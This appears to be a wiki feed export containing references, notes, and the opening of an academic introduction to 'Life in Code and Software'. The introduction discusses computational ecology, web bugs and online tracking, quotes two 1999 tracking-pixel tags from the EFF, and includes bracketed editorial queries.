&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4672</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4672"/>
		<updated>2012-03-19T10:52:56Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/ Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media&amp;amp;nbsp; in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet (Kitchin, 2011: 945).&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have a entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world (Deuze, Blank, and Speers, 2012).&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence (Madrigal, 2012). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012).&amp;amp;nbsp; These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the ChartBeat company ( [http://chartbeat.com] (http://chartbeat.com/)), it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs (Ghostery 2012b). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code and which is used to essentially shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal 2012). [Eds: please check that the singlee and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
